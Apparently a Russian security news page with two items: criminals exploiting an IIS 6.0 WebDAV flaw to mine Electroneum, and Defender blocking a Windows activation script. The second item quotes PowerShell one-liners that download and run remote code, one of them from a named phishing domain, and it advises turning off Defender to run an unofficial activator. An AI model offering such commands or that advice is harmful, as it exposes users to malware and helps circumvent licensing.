Киберпреступники используют брешь в IIS 6.0 для майнинга Electroneum

Киберпреступники используют брешь в IIS 6.0 для майнинга Electroneum

Киберпреступники используют брешь в IIS 6.0 для майнинга Electroneum

Злоумышленники используют уязвимость в IIS 6.0 для получения контроля над серверами Windows, а также для последующей установки вредоносной программы, которая добывает криптовалюту Electroneum. Поскольку используется старая версия IIS, атаки не нанесли глобального урона.

Используемая киберпреступниками уязвимость получила идентификатор CVE–2017–7269, она была обнаружена двумя китайскими исследователями в марте 2017 года. Данная брешь затрагивает службу WebDAV.

На момент обнаружения данный баг представлял собой брешь нулевого дня (0-day), которую активно использовали атакующие на протяжении почти девяти месяцев.

Первоначально Microsoft заявила, что не планирует исправлять недостаток, поскольку версия IIS 6.0 давно отжила свое, как и операционные системы, поставляемые с ней по умолчанию — Windows XP и Windows Server 2003.

Но после того как стало известно о связи этой бреши с экплойтом АНБ EXPLODINGCAN, в середине июня прошлого года корпорация приняла решение выпустить патчи. С тех пор этот баг использовался по меньшей мере одной киберпреступной группой для установки майнера Monero на серверы Windows, все еще использующие IIS 6.0.

Теперь же исследователи F5 Labs сообщили об обнаружении другой группы злоумышленников, использующей тот же самый эксплойт, но вместо майнинга Monero атакующие теперь майнят Electroneum.

В процессе заражения киберпреступники используют недавно открытую вредоносную технику Squiblydoo, которая задействует встроенные средства Windows. Процесс майнера маскируется под легитимный системный процесс lsass.exe.

На данный момент, по данным исследователей, злоумышленникам удалось заработать всего 99 долларов США благодаря этой вредоносной кампании.

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru